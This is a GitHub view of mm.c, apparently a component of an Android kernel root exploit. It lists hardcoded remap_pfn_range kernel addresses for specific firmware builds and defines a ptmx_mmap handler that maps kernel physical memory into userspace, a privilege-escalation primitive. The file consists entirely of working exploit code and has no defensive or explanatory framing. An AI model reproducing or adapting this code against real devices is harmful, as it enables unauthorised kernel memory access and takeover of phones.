-
Notifications
You must be signed in to change notification settings - Fork 359
/
Copy pathmm.c
74 lines (60 loc) · 1.92 KB
/
mm.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#include "kallsyms.h"
#include "mm.h"
#include "device_database/device_database.h"
typedef struct _supported_device {
device_id_t device_id;
unsigned long int remap_pfn_range_address;
} supported_device;
static supported_device supported_devices[] = {
{ DEVICE_IS17SH_01_00_04, 0xc0208a34 },
{ DEVICE_SH04E_01_00_02, 0xc00e458c },
{ DEVICE_SH04E_01_00_03, 0xc00e46bc },
{ DEVICE_SO01E_9_1_C_0_473, 0xc010e1f4 },
{ DEVICE_SOL21_9_1_D_0_395, 0xc010e33c },
{ DEVICE_HTL21_1_29_970_1, 0xc00ff32c },
{ DEVICE_HTL22_1_05_970_1, 0xc0128b10 },
{ DEVICE_HTL22_1_07_970_4, 0xc0128b28 },
{ DEVICE_HTX21_1_20_971_1, 0xc00fa8b0 },
{ DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0136294 },
{ DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0135650 },
{ DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0109894 },
{ DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc011445c },
{ DEVICE_N05E_A1000311, 0xc0105800 }
};
static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]);
unsigned long int
_get_remap_pfn_range_address(void)
{
int i;
device_id_t device_id;
device_id = detect_device();
for (i = 0; i < n_supported_devices; i++) {
if (supported_devices[i].device_id == device_id){
return supported_devices[i].remap_pfn_range_address;
}
}
print_reason_device_not_supported();
return 0;
}
void *
get_remap_pfn_range_address(void)
{
if (kallsyms_exist()) {
return kallsyms_get_symbol_address("remap_pfn_range");
}
return (void*)_get_remap_pfn_range_address();
}
static unsigned long int kernel_phys_offset = 0;
void
set_kernel_phys_offset(unsigned long int offset)
{
kernel_phys_offset = offset;
}
#define PAGE_SHIFT 12
int
ptmx_mmap(struct file *filep, struct vm_area_struct *vma)
{
return remap_pfn_range(vma, vma->vm_start,
kernel_phys_offset >> PAGE_SHIFT,
vma->vm_end - vma->vm_start, vma->vm_page_prot);
}